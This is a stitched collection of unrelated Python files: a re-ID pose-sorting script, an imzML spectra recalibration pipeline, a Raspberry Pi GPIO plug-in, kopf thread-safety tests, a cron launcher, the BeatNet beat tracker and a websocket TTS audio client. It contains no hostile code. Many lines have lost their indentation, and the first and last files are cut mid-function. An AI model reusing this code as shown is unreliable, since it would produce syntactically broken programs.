rect['front_side'] = get_info(ob, 'front_side')
rect['back_side'] = get_info(ob, 'back_side')
rect['noise'] = get_info(ob, 'noise')
try:
sums = sum(rect.values())
    except TypeError:  # some direction tags are missing, so rect contains None
sums = 0
return rect, sums
def mkdirs(root_dir):
if os.path.exists(root_dir) is False:
os.mkdir(root_dir)
direction_list = ['front', 'back', 'side', 'front_side', 'back_side', 'noise', 'null', 'error']
for i in direction_list:
if os.path.exists(root_dir+i) is False:
os.mkdir(root_dir+i)
def get_copy_list():
save_dir = 'cuhk03_train_fixed2/'
mkdirs(save_dir)
xml_list = glob.glob('cuhk03_annotations/*.xml')
copy_list = []
print('len(xml_list):', len(xml_list))
key_list = ['front', 'back', 'side', 'front_side', 'back_side', 'noise']
num_dict = {}
for i in key_list:
num_dict[i] = 0
for index, path in enumerate(xml_list):
if index % 5000 == 0:
print(index, len(xml_list))
rect, sums = get_direction(path)
if sums == 0:
#shutil.copyfile(path, save_dir+'null/'+os.path.basename(path))
copy_list.append([path, save_dir+'null/'+os.path.basename(path)])
path1 = path.replace('.xml', '.jpg')
#shutil.copyfile(path1, save_dir+'null/'+os.path.basename(path1))
copy_list.append([path1, save_dir+'null/'+os.path.basename(path1)])
continue
if sums > 1:
#shutil.copyfile(path, save_dir+'error/'+os.path.basename(path))
copy_list.append([path, save_dir+'error/'+os.path.basename(path)])
path1 = path.replace('.xml', '.jpg')
#shutil.copyfile(path1, save_dir+'error/'+os.path.basename(path1))
copy_list.append([path1, save_dir+'error/'+os.path.basename(path1)])
continue
for key in rect.keys():
if rect[key] == 1:
num_dict[key] += 1
path1 = path.replace('.xml', '.jpg')
#shutil.copyfile(path1, save_dir+key+'/'+os.path.basename(path1))
copy_list.append([path1, save_dir+key+'/'+os.path.basename(path1)])
break
print('-------------')
for i in key_list:
print(i, num_dict[i], round(num_dict[i]/len(xml_list), 3))
print('-------------')
print(round((num_dict['front']+num_dict['front_side'])/len(xml_list), 3))
print(round((num_dict['back']+num_dict['back_side'])/len(xml_list), 3))
print(round((num_dict['side'])/len(xml_list), 3))
return copy_list
def copy_img(path_list):
for path in path_list:
shutil.copyfile(path[0], path[1])
def split_direction():
copy_list = get_copy_list()
print('len(copy_list):', len(copy_list))
#exit(0)
num_jobs = 8
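    # Partition copy_list into num_jobs contiguous slices (index_list holds
    # the slice boundaries) and copy each slice in its own process.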
index_list = len(copy_list)*np.arange(0,1,1/num_jobs)
index_list = [int(i) for i in index_list]
index_list.append(len(copy_list))
print(index_list)
processes = list()
for i in range(num_jobs):
p = Process(target=copy_img, args=(copy_list[index_list[i]:index_list[i+1]],))
print('Process %d will start.' % i)
p.start()
processes.append(p)
for p in processes:
p.join()
def get_bbox(xml_path):
tree = ET.parse(xml_path)
rect={}
line=""
root = tree.getroot()
#for name in root.iter('path'):
# rect['path'] = os.path.basename(name.text)
def get_info(ob, name):
for front in ob.iter(name):
return int(front.text)
for ob in root.iter('bndbox'):
#for obb in root.iter('bndbox'):
xmin = get_info(ob, 'xmin')
ymin = get_info(ob, 'ymin')
xmax = get_info(ob, 'xmax')
ymax = get_info(ob, 'ymax')
break
print(xmin, xmax, ymin, ymax)
return xmin, xmax, ymin, ymax
if __name__ == '__main__':
'''
name = 'wait_to_crop_train/0010_c6s4_002427_07.jpg'
xmin, xmax, ymin, ymax = get_bbox('wait_to_crop_train/0010_c6s4_002427_07.xml')
img = cv2.imread(name)
#cv2.rectangle(img, (xmin,ymin),(xmax,ymax), (255,0,0),1)
img2 = img[ymin:ymax, xmin:xmax]
cv2.imshow('image', img2)
cv2.waitKey(0)
exit(0)
'''
image_list = glob.glob('wait_to_crop_test/*.jpg')
for name in image_list:
basename = os.path.basename(name)
img = cv2.imread(name)
if os.path.exists('wait_to_crop_test/'+basename[:-4]+'.xml'):
xmin, xmax, ymin, ymax = get_bbox('wait_to_crop_test/'+basename[:-4]+'.xml')
img = cv2.imread(name)
img2 = img[ymin:ymax, xmin:xmax]
cv2.imwrite('crop_test/'+basename, img2)
exit(0)
#split_direction()
image_map_direction = {}
direction_map_image = {}
img_list = []
save_dir = 'cuhk03_train_fixed2/'
direction_list = ['front', 'back', 'side', 'front_side', 'back_side', 'noise']
map_int = {'front':0,
'front_side': 0,
'side':1,
'noise':1,
'back': 2,
'back_side':2,}
map_int2 = {'front':0,
'front_side': 1,
'side':2,
'noise':5,
'back': 3,
'back_side':4,}
direction_int_list = []
direction_int_list2 = []
for i in direction_list:
image_list = os.listdir(save_dir+i)
direction_map_image[i] = image_list
for name in image_list:
image_map_direction[name] = (map_int[i], i)
direction_int_list.append(map_int[i])
direction_int_list2.append(map_int2[i])
if name[-8:] == '.jpg.jpg':
image_map_direction[name[:-4]] = (map_int[i], i)
print(name, name[:-4])
print(len(direction_int_list),
round(direction_int_list.count(0)/len(direction_int_list), 2),
round(direction_int_list.count(1)/len(direction_int_list), 2),
round(direction_int_list.count(2)/len(direction_int_list), 2))
print(set(direction_int_list))
print(len(direction_int_list2),
round(direction_int_list2.count(0)/len(direction_int_list2), 2),
round(direction_int_list2.count(1)/len(direction_int_list2), 2),
round(direction_int_list2.count(2)/len(direction_int_list2), 2),
round(direction_int_list2.count(3)/len(direction_int_list2), 2),
round(direction_int_list2.count(4)/len(direction_int_list2), 2),
round(direction_int_list2.count(5)/len(direction_int_list2), 2))
print(set(direction_int_list2))
save_file(image_map_direction, 'cuhk03_image_map_direction.pkl')
save_file(direction_map_image, 'cuhk03_direction_map_image.pkl')
save_file(image_map_direction, 'cuhk03_image_map_direction_py2.pkl', 2)
save_file(direction_map_image, 'cuhk03_direction_map_image_py2.pkl', 2)
print(len(image_map_direction))
exit(0)
print(image_map_direction)
exit(0)
image_map_direction = {}
direction_map_image = {}
save_dir = 'market1501_full_fixed2/'
direction_list = ['front', 'back', 'side', 'front_side', 'back_side', 'noise', 'null', 'error']
for i in direction_list:
image_list = os.listdir(save_dir+i)
exit(0)
exit(0)
#save_dir = 'DukeMTMC-reID_detail/'
save_dir = 'DukeMTMC-reID_detail/'
direction_list = ['front', 'back', 'side', 'front_side', 'back_side']
for i in direction_list:
listglob1 = glob.glob(save_dir+i+'/*.jpg')
for path in listglob1:
img = cv2.imread(path)
            img = cv2.resize(img, (50, 120))
cv2.imwrite(path, img)
#line = rect['path'] + "\t"+ rect['xmin']+ "\t"+rect['ymin']+"\t"+rect['xmax']+"\t"+rect['ymax']
|
recalibrate.py
|
import logging
from multiprocessing import JoinableQueue, Process
from pathlib import Path
from typing import Iterable, Union, Optional
import numpy as np
import pandas as pd
from pyimzml.ImzMLParser import ImzMLParser
from pyimzml.ImzMLWriter import ImzMLWriter
from msi_recal.evaluate import EvalPeaksCollector
from msi_recal.params import RecalParams
from msi_recal.passes.align_msiwarp import AlignMsiwarp
from msi_recal.passes.align_ransac import AlignRansac
from msi_recal.passes.normalize import Normalize
from msi_recal.passes.recal_msiwarp import RecalMsiwarp
from msi_recal.passes.recal_ransac import RecalRansac
try:
from typing import Literal
except ImportError:
from typing_extensions import Literal
logger = logging.getLogger(__name__)
TRANSFORM = {
'align_msiwarp': AlignMsiwarp,
'align_ransac': AlignRansac,
'recal_msiwarp': RecalMsiwarp,
'recal_ransac': RecalRansac,
'normalize': Normalize,
}
def get_spectra_df_from_parser(p: ImzMLParser, sp_idxs: Iterable[int]):
peaks_dfs = []
spectra = []
for i in sp_idxs:
mzs, ints = p.getspectrum(i)
x, y, z = p.coordinates[i]
mask = ints > 0
mzs = mzs[mask].astype(np.float64)
ints = ints[mask].astype(np.float32)
peaks_dfs.append(pd.DataFrame({'sp': i, 'mz': mzs, 'ints': ints}))
spectra.append((i, x, y, z, np.min(mzs), np.max(mzs), np.sum(ints)))
peaks_df = pd.concat(peaks_dfs)
spectra_df = pd.DataFrame(
spectra, columns=['sp', 'x', 'y', 'z', 'mz_lo', 'mz_hi', 'tic']
).set_index('sp')
return peaks_df, spectra_df
def get_sample_spectra_df_from_parser(p: ImzMLParser, n_samples=200):
sp_n = len(p.coordinates)
sp_idxs = np.sort(np.random.choice(sp_n, min(n_samples, sp_n), False))
return get_spectra_df_from_parser(p, sp_idxs)
def build_pipeline(sample_peaks_df: pd.DataFrame, params: RecalParams, cache_path: Optional[Path]):
models = []
stages = [
('initial', sample_peaks_df),
]
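    # Each transform is fitted on the sample peaks as already corrected by the
    # preceding transforms, so the order of params.transforms matters.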
for tf_name, *tf_args in params.transforms:
logger.info(f'Fitting {tf_name} model')
assert tf_name in TRANSFORM, f'Unrecognized transform "{tf_name}"'
tf = TRANSFORM[tf_name](params, *tf_args)
loaded_cache = False
if cache_path is not None:
try:
tf.load_cache(f'{cache_path}/{tf_name}')
loaded_cache = True
logger.debug(f'{tf_name} loaded from cache')
except (IOError, EOFError):
logger.debug(f'{tf_name} not cached')
if not loaded_cache:
tf.fit(sample_peaks_df)
sample_peaks_df = tf.predict(sample_peaks_df)
models.append(tf)
stages.append((tf_name, sample_peaks_df))
# Hacky progress report
eval = EvalPeaksCollector(sample_peaks_df, params)
for stage_name, stage_df in stages:
eval.collect_peaks(stage_df, stage_name)
logger.debug(
pd.DataFrame(
{stage_name: eval.get_stats(stage_name).abs().mean() for stage_name, stage_df in stages}
)
)
eval.reset()
return models, eval
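# Writer protocol: the main loop puts lists of (mzs, ints, coord) tuples onto a
# JoinableQueue and finally a None sentinel; every item is task_done()-ed so
# that writer_queue.join() can block until all spectra have been written.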
def _imzml_writer_process(output_path, queue):
with ImzMLWriter(output_path) as writer:
while True:
job = queue.get()
queue.task_done()
if job is not None:
for mzs, ints, coord in job:
writer.addSpectrum(mzs, ints, coord)
if job is None:
return
def _null_writer_process(output_path, queue):
while queue.get() is not None:
queue.task_done()
queue.task_done()
def process_imzml_file(
input_path: Union[str, Path],
params: RecalParams,
output_path: Union[str, Path, None, Literal['infer']] = 'infer',
debug_path: Union[str, Path, None, Literal['infer']] = 'infer',
cache_path: Union[str, Path, None, Literal['infer']] = 'infer',
samples: int = 100,
    limit: Optional[int] = None,
):
input_path = Path(input_path)
if output_path == 'infer':
output_path = Path(f'{input_path.parent}/{input_path.stem}_recal.imzML')
if debug_path == 'infer':
debug_path = Path(f'{input_path.parent}/{input_path.stem}_debug/')
if cache_path == 'infer':
cache_path = Path(f'{input_path.parent}/{input_path.stem}_cache/')
cache_path.mkdir(parents=True, exist_ok=True)
cache_path = Path(cache_path) if cache_path is not None else None
p = ImzMLParser(str(input_path), parse_lib="ElementTree")
sample_peaks_df, sample_spectra_df = get_sample_spectra_df_from_parser(p, n_samples=samples)
models, eval = build_pipeline(sample_peaks_df, params, cache_path)
writer_queue = JoinableQueue(2)
writer_func = _imzml_writer_process if output_path else _null_writer_process
writer_process = Process(target=writer_func, args=(output_path, writer_queue))
writer_process.start()
all_spectra_dfs = []
try:
chunk_size = 1000
if limit:
skip = max(0, (len(p.coordinates) - limit) // 2)
sp_n = min(limit, len(p.coordinates) - skip)
else:
skip = 0
sp_n = len(p.coordinates)
for start_i in range(skip, skip + sp_n, chunk_size):
end_i = min(start_i + chunk_size, len(p.coordinates))
if start_i >= end_i:
continue
logger.debug(f'Reading spectra {start_i}-{end_i} out of {len(p.coordinates)}')
peaks_df, spectra_df = get_spectra_df_from_parser(p, np.arange(start_i, end_i))
eval.collect_peaks(peaks_df, 'before')
# Convert to tuples, because spectra_df.loc coalesces everything into floats
spectra_dict = {row[0]: row for row in spectra_df.itertuples()}
all_spectra_dfs.append(spectra_df)
logger.info(f'Transforming spectra {start_i}-{end_i}')
for model in models:
peaks_df = model.predict(peaks_df)
eval.collect_peaks(peaks_df, 'after')
writer_job = []
for sp, grp in peaks_df.groupby('sp'):
spectrum = spectra_dict[sp]
writer_job.append((grp.mz, grp.ints, (spectrum.x, spectrum.y, spectrum.z)))
logger.debug(f'Writing spectra {start_i}-{end_i}')
writer_queue.put(writer_job)
if cache_path:
for model in models:
model.save_cache()
except KeyboardInterrupt:
pass # Don't rethrow - save the debug data if possible
finally:
writer_queue.put(None)
writer_queue.close()
writer_queue.join()
writer_process.join()
logger.info(f'Finished writing {output_path}')
if debug_path:
debug_path.mkdir(parents=True, exist_ok=True)
existing_debug_files = [p for p in debug_path.iterdir() if p.is_file()]
if existing_debug_files:
logger.info(f'Cleaning debug output directory')
for file in existing_debug_files:
file.unlink()
logger.info(f'Writing debug output to {debug_path}')
        (debug_path / 'params.txt').write_text(repr(params))
all_spectra_df = pd.concat(all_spectra_dfs)
for i, ((transform_name, *_), model) in enumerate(zip(params.transforms, models)):
try:
if hasattr(model, 'save_debug'):
model.save_debug(all_spectra_df, str(debug_path / f'{i}_{transform_name}'))
            except Exception:
                logger.warning(f'{transform_name} error', exc_info=True)
eval.get_report().to_csv(debug_path / 'evaluation_peaks.csv')
return eval
|
rpigpio.py
|
from apama.eplplugin import EPLAction, EPLPluginBase, Correlator, Event, Any
from gpiozero import LightSensor
import threading, queue
class Job(object):
"""
    A light-sensor monitoring job to be executed asynchronously.
    @param pin the GPIO pin the light sensor is attached to
    @param threshold the light level at which the callback should fire
    @param fn a callable invoked with the new sensor value when the threshold is crossed
    """
def __init__(self, pin, threshold, fn):
self.pin = pin
self.threshold = threshold
self.fn = fn
def iothread(plugin):
"""
Background thread to execute async jobs on.
"""
plugin.getLogger().debug("Starting background IO thread for asynchronous jobs")
ldrs = {}
while plugin.running:
try:
job = plugin.queue.get(timeout=1.0)
ldrs[job.pin] = (LightSensor(job.pin), job.threshold, job.fn, job.threshold)
except queue.Empty:
pass
except Exception as e:
            plugin.getLogger().error("Exception adding light sensor: " + str(e))
try:
for p in ldrs:
(pin, threshold, fn, oldvalue) = ldrs[p]
v = pin.value
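                # Invoke the callback only when the reading crosses the threshold
                # (in either direction) since the previous poll.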
                if (v > threshold and oldvalue < threshold) or (v < threshold and oldvalue > threshold):
fn(v)
ldrs[p] = (pin, threshold, fn, v)
except Exception as e:
            plugin.getLogger().error("Exception checking light sensors: " + str(e))
plugin.getLogger().info("iothread done")
class RPiGPIOPluginClass(EPLPluginBase):
    """
    EPL plug-in exposing Raspberry Pi GPIO light sensors (via gpiozero) to Apama applications.
    """
def __init__(self, init):
super(RPiGPIOPluginClass, self).__init__(init)
self.running = True
self.queue = queue.SimpleQueue()
self.thread = threading.Thread(target=iothread, args=[self], name='Apama RPiGPIOPluginClass io thread')
self.thread.start()
def _sendResponseEvent(self, channel, eventType, body):
Correlator.sendTo(channel, Event(eventType, body))
@EPLAction("action<integer, float, string>")
def startLightSensor(self, pin, threshold, channel):
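        """
        Plug-in action that starts monitoring a light sensor on the given GPIO pin and sends a
        com.apamax.LightThreshold event to `channel` whenever the reading crosses `threshold`.
        """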
self.queue.put(Job(pin, threshold,
lambda newvalue: self._sendResponseEvent(channel, "com.apamax.LightThreshold", {
"pin": pin,
"threshold": threshold,
"value": newvalue,
"state": True if newvalue>threshold else False,
})
))
@EPLAction("action<>")
def shutdown(self):
"""
Plug-in function to shutdown the background thread.
"""
        self.getLogger().debug("Shutting down RPi GPIO plug-in")
self.running = False
self.thread.join()
|
test_threadsafety.py
|
"""
A little note on how these tests work:
Almost all asyncio objects are not thread-safe, as per the official doc.
This includes `asyncio.Queue`. This queue is used for k8s-event posting.
K8s-events are posted via ``kopf.event()`` and similar calls,
and also via ``logger.info()`` for per-object logging messages.
The calls originate from various threads:
* Main thread where the framework's event-loop runs.
* Thread-pool executors for sync handlers.
* Explicitly started threads for object monitoring
(e.g. from ``@kopf.on.resume`` handlers).
In the main thread, there is an event-loop running, and it has an asyncio task
to get the k8s-event events from the queue and to post them to the K8s API.
In the non-thread-safe mode, putting an object via ``queue.put_nowait()``
does **NOT** wake up the pending ``queue.get()`` in the `poster` task
until something happens on the event-loop (not necessarily on the queue).
In the thread-safe mode, putting an object via ``queue.put()``
(which is a coroutine and must be executed in the loop)
wakes the pending ``queue.get()`` call immediately.
These tests ensure that the thread-safe calls are used for k8s-event posting
by artificially reproducing the described situation. The delayed no-op task
(awakener) is used to wake up the event-loop after some time if the k8s-event
posting is not thread-safe. Otherwise, it wakes up on ``queue.get()`` instantly.
If thread safety is not ensured, the operators get sporadic errors regarding
thread-unsafe calls, which are difficult to catch and reproduce.
"""
import asyncio
import contextvars
import functools
import threading
import time
import pytest
from kopf import event
OBJ1 = {'apiVersion': 'group1/version1', 'kind': 'Kind1',
'metadata': {'uid': 'uid1', 'name': 'name1', 'namespace': 'ns1'}}
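# Illustrative sketch (not part of the original test suite): a minimal, standalone
# demonstration of the thread-safe posting pattern described in the module docstring.
# The helper name `_demo_threadsafe_posting` is hypothetical and exists only for illustration.
def _demo_threadsafe_posting() -> float:
    """Measure how long a pending ``queue.get()`` waits when a foreign thread posts an item."""

    async def main() -> float:
        loop = asyncio.get_running_loop()
        queue: asyncio.Queue = asyncio.Queue()

        def producer() -> None:
            time.sleep(0.3)
            # Thread-safe: schedule ``queue.put()`` on the loop; this wakes the pending
            # ``queue.get()`` below immediately. Calling ``queue.put_nowait()`` directly
            # from this thread would not wake it until the loop stirs for another reason.
            asyncio.run_coroutine_threadsafe(queue.put(object()), loop=loop)

        producer_thread = threading.Thread(target=producer)
        producer_thread.start()
        started = time.monotonic()
        await queue.get()
        waited = time.monotonic() - started
        producer_thread.join()
        return waited

    return asyncio.run(main())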
@pytest.fixture()
def awakener(event_loop):
handles = []
def noop():
pass
def awaken_fn(delay, fn=noop):
handle = event_loop.call_later(delay, fn)
handles.append(handle)
try:
yield awaken_fn
finally:
for handle in handles:
handle.cancel()
@pytest.fixture()
def threader():
threads = []
def start_fn(delay, fn):
def thread_fn():
time.sleep(delay)
fn()
target = functools.partial(contextvars.copy_context().run, thread_fn)
thread = threading.Thread(target=target)
thread.start()
threads.append(thread)
try:
yield start_fn
finally:
for thread in threads:
thread.join()
async def test_nonthreadsafe_indeed_fails(timer, awakener, threader, event_queue, event_queue_loop):
def thread_fn():
event_queue.put_nowait(object())
awakener(0.7)
threader(0.3, thread_fn)
with timer:
await event_queue.get()
assert 0.6 <= timer.seconds <= 0.8
async def test_threadsafe_indeed_works(timer, awakener, threader, event_queue, event_queue_loop):
def thread_fn():
asyncio.run_coroutine_threadsafe(event_queue.put(object()), loop=event_queue_loop)
awakener(0.7)
threader(0.3, thread_fn)
with timer:
await event_queue.get()
assert 0.2 <= timer.seconds <= 0.4
async def test_queueing_is_threadsafe(timer, awakener, threader, event_queue, event_queue_loop,
settings_via_contextvar):
def thread_fn():
event(OBJ1, type='type1', reason='reason1', message='message1')
awakener(0.7)
threader(0.3, thread_fn)
with timer:
await event_queue.get()
assert 0.2 <= timer.seconds <= 0.4
|
cron_app.py
|
#encoding:utf-8
import datetime
import csv
import logging
from multiprocessing import Process
import time
import yaml
from croniter import croniter
from supplier import supply
logger = logging.getLogger(__name__)
def read_own_cron(own_cron_filename, config):
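    """Read a tab-separated cron file with MASK and submodule_name columns and start a
    `supply` process for each entry whose cron schedule falls due in the current minute."""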
with open(own_cron_filename) as tsv_file:
tsv_reader = csv.DictReader(tsv_file, delimiter='\t')
for row in tsv_reader:
now = datetime.datetime.now()
cron = croniter(row['MASK'])
# prev_run = cron.get_current(datetime.datetime)
prev_run = cron.get_prev(datetime.datetime)
prev_run = cron.get_next(datetime.datetime)
diff = now - prev_run
diff_seconds = diff.total_seconds()
if diff_seconds >= 0.0 and diff_seconds <= 59.9:
# print(row['submodule_name'], diff_seconds)
# supply(row['submodule_name'], config)
supplying_process = Process(target=supply, args=(row['submodule_name'], config))
supplying_process.start()
time.sleep(2)
def main(config_filename):
with open(config_filename) as config_file:
        config = yaml.safe_load(config_file.read())
read_own_cron(config['cron_file'], config)
if __name__ == '__main__':
import argparse
parser = argparse.ArgumentParser()
parser.add_argument('--config', default='configs/prod.yml')
args = parser.parse_args()
main(args.config)
|
BeatNet.py
|
# This is the BeatNet user script. First, it extracts the spectral features and then
# feeds them to one of the pre-trained models to get beat/downbeat activations.
# Therefore, it infers beats and downbeats based on one of the two offline and online inference models.
import os
import torch
import numpy as np
from madmom.features import DBNDownBeatTrackingProcessor
from BeatNet.particle_filtering_cascade import particle_filter_cascade
from BeatNet.log_spect import LOG_SPECT
import librosa
import sys
from BeatNet.model import BDA
import pyaudio
import matplotlib.pyplot as plt
import time
import threading
class BeatNet:
'''
    The main BeatNet handler class, covering the different pre-trained models, the different
    modes for extracting activations, and causal and non-causal inference.
    Parameters
    ----------
    Inputs:
        model: A scalar in the range [1, 3] selecting which pre-trained CRNN model to utilize.
        mode: A string determining the working mode, i.e. 'stream', 'realtime', 'online' and 'offline'.
            'stream' mode: Uses the system microphone to capture sound and processes it in real time. Since the model was trained on standard mastered songs, it is highly recommended to make the microphone sound as loud as possible; less reverberation leads to better results.
            'realtime' mode: Reads an audio file chunk by chunk and processes one chunk at a time.
            'online' mode: Reads the whole audio, feeds it into the BeatNet CRNN at once, and then infers the parameters of interest using particle filtering.
            'offline' mode: Reads the whole audio, feeds it into the BeatNet CRNN at once, and then infers the parameters of interest using the madmom dynamic Bayesian network. This method is quicker than madmom beat/downbeat tracking.
        inference_model: A string choosing the inference approach, i.e. 'PF' (Particle Filtering) for causal inference and 'DBN' (Dynamic Bayesian Network) for non-causal usage.
        plot: A list of strings selecting what to plot.
            'activations': Plots the neural network activations for beats and downbeats of each time frame.
            'beat_particles': Plots the beat/tempo tracking state space and current particle states at each time frame.
            'downbeat_particles': Plots the downbeat/meter tracking state space and current particle states at each time frame.
            Note that to speed up plotting, the previous figures are updated rather than redrawn for every frame. However, to preserve real-time performance, it is recommended not to plot, or to keep the number of simultaneous plots as small as possible.
        thread: Whether to run the inference in the main thread or in a separate thread.
    Outputs:
        A vector with beat times and a downbeat identifier column, respectively, with the following shape: numpy_array(num_beats, 2).
    See the minimal usage sketch at the end of this file.
    '''
def __init__(self, model, mode='online', inference_model='PF', plot=[], thread=False):
self.model = model
self.mode = mode
self.inference_model = inference_model
self.plot= plot
self.thread = thread
if plot and thread:
raise RuntimeError('Plotting cannot be accomplished in the threading mode')
self.sample_rate = 22050
self.log_spec_sample_rate = self.sample_rate
self.log_spec_hop_length = int(20 * 0.001 * self.log_spec_sample_rate)
self.log_spec_win_length = int(64 * 0.001 * self.log_spec_sample_rate)
self.proc = LOG_SPECT(sample_rate=self.log_spec_sample_rate, win_length=self.log_spec_win_length,
hop_size=self.log_spec_hop_length, n_bands=[24], mode = self.mode)
if self.inference_model == "PF": # instantiating a Particle Filter decoder - Is Chosen for online inference
self.estimator = particle_filter_cascade(beats_per_bar=[], fps=50, plot=self.plot, mode=self.mode)
elif self.inference_model == "DBN": # instantiating an HMM decoder - Is chosen for offline inference
self.estimator = DBNDownBeatTrackingProcessor(beats_per_bar=[2, 3, 4], fps=50)
else:
raise RuntimeError('inference_model can be either "PF" or "DBN"')
script_dir = os.path.dirname(__file__)
        # assigning a BeatNet CRNN instance to extract joint beat and downbeat activations
        self.model = BDA(272, 150, 2, 'cpu')  # Beat Downbeat Activation detector
        # loading the pre-trained BeatNet CRNN weights
if model == 1: # GTZAN out trained model
self.model.load_state_dict(torch.load(os.path.join(script_dir, 'models/model_1_weights.pt')), strict=False)
elif model == 2: # Ballroom out trained model
self.model.load_state_dict(torch.load(os.path.join(script_dir, 'models/model_2_weights.pt')), strict=False)
elif model == 3: # Rock_corpus out trained model
self.model.load_state_dict(torch.load(os.path.join(script_dir, 'models/model_3_weights.pt')), strict=False)
else:
raise RuntimeError(f'Failed to open the trained model: {model}')
self.model.eval()
if self.mode == 'stream':
self.stream_window = np.zeros(self.log_spec_win_length + 2 * self.log_spec_hop_length, dtype=np.float32)
self.stream = pyaudio.PyAudio().open(format=pyaudio.paFloat32,
channels=1,
rate=self.sample_rate,
input=True,
frames_per_buffer=self.log_spec_hop_length,)
def process(self, audio_path=None):
if self.mode == "stream":
if self.inference_model != "PF":
                raise RuntimeError('The inference model should be set to "PF" for the streaming mode!')
self.counter = 0
while self.stream.is_active():
                self.activation_extractor_stream()  # Using the BeatNet causal neural network streaming mode to extract activations
                if self.thread:
                    x = threading.Thread(target=self.estimator.process, args=(self.pred,), daemon=True)  # Processing the inference in another thread
x.start()
x.join()
else:
output = self.estimator.process(self.pred)
self.counter += 1
elif self.mode == "realtime":
self.counter = 0
self.completed = 0
if self.inference_model != "PF":
                raise RuntimeError('The inference model for the realtime mode should be set to "PF".')
            if audio_path is not None:
                while self.completed == 0:
                    self.activation_extractor_realtime(audio_path)  # Using the BeatNet causal neural network realtime mode to extract activations
                    if self.thread:
                        x = threading.Thread(target=self.estimator.process, args=(self.pred,), daemon=True)  # Processing the inference in another thread
x.start()
x.join()
else:
output = self.estimator.process(self.pred) # Using particle filtering online inference to infer beat/downbeats
self.counter += 1
return output
else:
raise RuntimeError('An audio object or file directory is required for the realtime usage!')
elif self.mode == "online":
            if audio_path is not None:
                preds = self.activation_extractor_online(audio_path)  # Using the BeatNet causal neural network to extract activations
else:
raise RuntimeError('An audio object or file directory is required for the online usage!')
if self.inference_model == "PF": # Particle filtering inference (causal)
                print('.....__running_particle_inference__.....')
output = self.estimator.process(preds) # Using particle filtering online inference to infer beat/downbeats
return output
elif self.inference_model == "DBN": # Dynamic bayesian Network Inference (non-causal)
output = self.estimator(preds) # Using DBN offline inference to infer beat/downbeats
return output
elif self.mode == "offline":
if self.inference_model != "DBN":
                raise RuntimeError('The inference model should be set to "DBN" for the offline mode!')
            if audio_path is not None:
                preds = self.activation_extractor_online(audio_path)  # Using the BeatNet causal neural network to extract activations
output = self.estimator(preds) # Using DBN offline inference to infer beat/downbeats
return output
else:
raise RuntimeError('An audio object or file directory is required for the offline usage!')
def activation_extractor_stream(self):
# TODO:
''' Streaming window
Given the training input window's origin set to center, this streaming data formation causes 0.084 (s) delay compared to the trained model that needs to be fixed.
'''
with torch.no_grad():
hop = self.stream.read(self.log_spec_hop_length)
hop = np.frombuffer(hop, dtype=np.float32)
self.stream_window = np.append(self.stream_window[self.log_spec_hop_length:], hop)
if self.counter < 5:
self.pred = np.zeros([1,2])
else:
feats = self.proc.process_audio(self.stream_window).T[-1]
feats = torch.from_numpy(feats)
feats = feats.unsqueeze(0).unsqueeze(0)
pred = self.model(feats)[0]
pred = self.model.final_pred(pred)
pred = pred.detach().numpy()
self.pred = np.transpose(pred[:2, :])
def activation_extractor_realtime(self, audio_path):
with torch.no_grad():
if self.counter==0: #loading the audio
if isinstance(audio_path, str):
self.audio, _ = librosa.load(audio_path, sr=self.sample_rate) # reading the data
else:
self.audio = audio_path
if self.counter<(round(len(self.audio)/self.log_spec_hop_length)):
if self.counter<2:
self.pred = np.zeros([1,2])
else:
feats = self.proc.process_audio(self.audio[self.log_spec_hop_length * (self.counter-2):self.log_spec_hop_length * (self.counter) + self.log_spec_win_length]).T[-1]
feats = torch.from_numpy(feats)
feats = feats.unsqueeze(0).unsqueeze(0)
pred = self.model(feats)[0]
pred = self.model.final_pred(pred)
pred = pred.detach().numpy()
self.pred = np.transpose(pred[:2, :])
else:
self.completed = 1
def activation_extractor_online(self, audio_path):
with torch.no_grad():
if isinstance(audio_path, str):
audio, _ = librosa.load(audio_path, sr=self.sample_rate) # reading the data
else:
audio = audio_path
feats = self.proc.process_audio(audio).T
print('input_feats_shape_T',feats.shape)
feats = torch.from_numpy(feats)
feats = feats.unsqueeze(0)
preds = self.model(feats)[0] # extracting the activations by passing the feature through the NN and [0] for making shape independent of batchsize
print(preds.shape)
# print(preds)
preds = self.model.final_pred(preds)
# print(preds)
preds = preds.detach().numpy()
preds = np.transpose(preds[:2, :])
print(preds.shape)
return preds
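# Example usage (illustrative sketch, not part of the library): offline beat/downbeat
# estimation with the DBN decoder. The audio path below is a placeholder, and the
# pre-trained weight files are assumed to be installed next to this module.
if __name__ == '__main__':
    estimator = BeatNet(1, mode='offline', inference_model='DBN', plot=[], thread=False)
    # `process` returns a numpy array of shape (num_beats, 2): beat time and downbeat identifier.
    beats = estimator.process('path/to/audio.wav')
    print(beats)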
|
ws_client_playaudio.py
|
# Copyright (c) 2022 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import _thread as thread
import argparse
import base64
import json
import ssl
import threading
import time
import pyaudio
import websocket
mutex = threading.Lock()
buffer = b''
p = pyaudio.PyAudio()
stream = p.open(
format=p.get_format_from_width(2), channels=1, rate=24000, output=True)
flag = 1
st = 0.0
all_bytes = 0.0
class WsParam(object):
    # Initialization
def __init__(self, text, server="127.0.0.1", port=8090):
self.server = server
self.port = port
self.url = "ws://" + self.server + ":" + str(self.port) + "/ws/tts"
self.text = text
    # Generate the websocket URL
def create_url(self):
return self.url
def play_audio():
global stream
global buffer
while True:
time.sleep(0.05)
        if not buffer:  # buffer is empty
break
mutex.acquire()
stream.write(buffer)
buffer = b''
mutex.release()
t = threading.Thread(target=play_audio)
def on_message(ws, message):
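    # As handled below, each server message is JSON with a base64-encoded `audio` field and a
    # `status` field: 0 = session created, 1 = intermediate audio chunk, 2 = synthesis finished.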
global flag
global t
global buffer
global st
global all_bytes
try:
message = json.loads(message)
audio = message["audio"]
audio = base64.b64decode(audio) # bytes
status = message["status"]
all_bytes += len(audio)
if status == 0:
print("create successfully.")
elif status == 1:
mutex.acquire()
buffer += audio
mutex.release()
if flag:
                print(f"First-packet latency: {time.time() - st} s")
flag = 0
print("Start playing audio")
t.start()
elif status == 2:
final_response = time.time() - st
duration = all_bytes / 2 / 24000
            print(f"Final-packet latency: {final_response} s")
            print(f"Audio duration: {duration} s")
print(f"RTF: {final_response / duration}")
